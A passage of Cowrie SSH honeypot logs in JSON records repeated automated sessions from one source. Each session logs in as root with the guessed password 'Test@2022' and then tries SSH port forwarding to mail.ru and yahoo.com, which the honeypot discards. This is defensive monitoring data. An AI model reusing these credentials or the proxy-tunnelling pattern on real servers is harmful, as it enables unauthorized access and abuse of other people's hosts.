es128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:25.805386Z","src_ip":"77.83.207.83","session":"f7fe4f469ce3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:26.053692Z","src_ip":"77.83.207.83","session":"f7fe4f469ce3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":2292,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:2292","sensor":"my-vps","timestamp":"2025-08-31T03:49:26.104296Z","session":"f7fe4f469ce3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:26.154110Z","src_ip":"77.83.207.83","session":"f7fe4f469ce3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":7982,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:7982","sensor":"my-vps","timestamp":"2025-08-31T03:49:26.296160Z","session":"f7fe4f469ce3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:26.346060Z","src_ip":"77.83.207.83","session":"f7fe4f469ce3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":8643,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:8643","sensor":"my-vps","timestamp":"2025-08-31T03:49:26.488170Z","session":"f7fe4f469ce3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:26.537988Z","src_ip":"77.83.207.83","session":"f7fe4f469ce3"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:26.589122Z","src_ip":"77.83.207.83","session":"f7fe4f469ce3"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":9364,"dst_ip":"1.2.3.4","dst_port":22,"session":"07c81dd7e330","protocol":"ssh","message":"New connection: 77.83.207.83:9364 (1.2.3.4:22) [session: 07c81dd7e330]","sensor":"my-vps","timestamp":"2025-08-31T03:49:26.639009Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:26.639896Z","src_ip":"77.83.207.83","session":"07c81dd7e330"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:26.690159Z","src_ip":"77.83.207.83","session":"07c81dd7e330"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:26.940536Z","src_ip":"77.83.207.83","session":"07c81dd7e330"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":17571,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:17571","sensor":"my-vps","timestamp":"2025-08-31T03:49:26.991543Z","session":"07c81dd7e330"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:27.041958Z","src_ip":"77.83.207.83","session":"07c81dd7e330"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":18345,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:18345","sensor":"my-vps","timestamp":"2025-08-31T03:49:27.184665Z","session":"07c81dd7e330"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:27.235040Z","src_ip":"77.83.207.83","session":"07c81dd7e330"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":22931,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:22931","sensor":"my-vps","timestamp":"2025-08-31T03:49:27.376708Z","session":"07c81dd7e330"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:27.427161Z","src_ip":"77.83.207.83","session":"07c81dd7e330"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:27.478706Z","src_ip":"77.83.207.83","session":"07c81dd7e330"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":9460,"dst_ip":"1.2.3.4","dst_port":22,"session":"0aba29963abd","protocol":"ssh","message":"New connection: 77.83.207.83:9460 (1.2.3.4:22) [session: 0aba29963abd]","sensor":"my-vps","timestamp":"2025-08-31T03:49:27.527842Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:27.537694Z","src_ip":"77.83.207.83","session":"0aba29963abd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:27.578914Z","src_ip":"77.83.207.83","session":"0aba29963abd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:27.830706Z","src_ip":"77.83.207.83","session":"0aba29963abd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":12242,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:12242","sensor":"my-vps","timestamp":"2025-08-31T03:49:27.881901Z","session":"0aba29963abd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:27.932363Z","src_ip":"77.83.207.83","session":"0aba29963abd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":25002,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:25002","sensor":"my-vps","timestamp":"2025-08-31T03:49:28.076693Z","session":"0aba29963abd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:28.127145Z","src_ip":"77.83.207.83","session":"0aba29963abd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":18810,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:18810","sensor":"my-vps","timestamp":"2025-08-31T03:49:28.268728Z","session":"0aba29963abd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:28.319271Z","src_ip":"77.83.207.83","session":"0aba29963abd"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:28.371014Z","src_ip":"77.83.207.83","session":"0aba29963abd"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":9531,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2fea5bb5247","protocol":"ssh","message":"New connection: 77.83.207.83:9531 (1.2.3.4:22) [session: f2fea5bb5247]","sensor":"my-vps","timestamp":"2025-08-31T03:49:28.419089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:28.419978Z","src_ip":"77.83.207.83","session":"f2fea5bb5247"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:28.469659Z","src_ip":"77.83.207.83","session":"f2fea5bb5247"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:28.716866Z","src_ip":"77.83.207.83","session":"f2fea5bb5247"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":1321,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:1321","sensor":"my-vps","timestamp":"2025-08-31T03:49:28.767684Z","session":"f2fea5bb5247"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:28.817657Z","src_ip":"77.83.207.83","session":"f2fea5bb5247"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":14084,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:14084","sensor":"my-vps","timestamp":"2025-08-31T03:49:28.959937Z","session":"f2fea5bb5247"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:29.009763Z","src_ip":"77.83.207.83","session":"f2fea5bb5247"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":29334,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:29334","sensor":"my-vps","timestamp":"2025-08-31T03:49:29.151936Z","session":"f2fea5bb5247"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:29.201611Z","src_ip":"77.83.207.83","session":"f2fea5bb5247"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:29.252033Z","src_ip":"77.83.207.83","session":"f2fea5bb5247"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":9619,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e0375b2fe2d","protocol":"ssh","message":"New connection: 77.83.207.83:9619 (1.2.3.4:22) [session: 3e0375b2fe2d]","sensor":"my-vps","timestamp":"2025-08-31T03:49:29.300846Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:29.310712Z","src_ip":"77.83.207.83","session":"3e0375b2fe2d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:29.350848Z","src_ip":"77.83.207.83","session":"3e0375b2fe2d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:29.599010Z","src_ip":"77.83.207.83","session":"3e0375b2fe2d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23878,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:23878","sensor":"my-vps","timestamp":"2025-08-31T03:49:29.649713Z","session":"3e0375b2fe2d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:29.699707Z","src_ip":"77.83.207.83","session":"3e0375b2fe2d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":2226,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:2226","sensor":"my-vps","timestamp":"2025-08-31T03:49:29.840192Z","session":"3e0375b2fe2d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:29.890353Z","src_ip":"77.83.207.83","session":"3e0375b2fe2d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":32040,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:32040","sensor":"my-vps","timestamp":"2025-08-31T03:49:30.032136Z","session":"3e0375b2fe2d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:30.081925Z","src_ip":"77.83.207.83","session":"3e0375b2fe2d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:30.132797Z","src_ip":"77.83.207.83","session":"3e0375b2fe2d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":9692,"dst_ip":"1.2.3.4","dst_port":22,"session":"82b96b582c96","protocol":"ssh","message":"New connection: 77.83.207.83:9692 (1.2.3.4:22) [session: 82b96b582c96]","sensor":"my-vps","timestamp":"2025-08-31T03:49:30.182331Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:30.191847Z","src_ip":"77.83.207.83","session":"82b96b582c96"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs